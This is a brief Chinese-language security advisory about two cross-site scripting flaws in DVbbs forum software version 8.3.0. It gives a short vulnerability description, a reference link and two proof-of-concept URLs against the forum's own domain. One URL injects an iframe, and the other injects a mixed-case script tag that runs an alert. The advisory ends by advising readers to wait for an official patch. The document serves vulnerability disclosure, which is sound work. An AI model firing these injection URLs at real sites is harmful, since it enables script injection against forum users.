动网(DVbbs) Ver 8.3.0 多个跨站漏洞

影响版本:
DVbbs Version 8.3.0

漏洞描述:
动网论坛做为目前国内最大的社区论坛软件服务提供商，依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的 技术和强大而持续的产品研发并保持不断创新的能力，动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。

目标网站对用户提交的变量代码未进行有效的过滤或转换，允许攻击者插入恶意WEB代码。

此版本新存在两处跨站漏洞

<*参考

http://www.syue.com/Hacker/Script/14488.html

*>
测试方法:

demo1:
http://bbs.dvbbs.net/showerr.asp?BoardID=8&ErrCodes=60&action=%22%3E%3Ciframe%20src=%22http://www.syue.com%22+zhuba

demo2:
http://bbs.dvbbs.net/index.asp?boardid=8&TopicMode=0&List_Type=%27%22%29%3b%3E%3C%2fIfRaMe%3E%3CscRiPT%3Ealert%28%27www.syue.com%27%29%3C%2fScrIPT%3E

安全建议:
等待官方补丁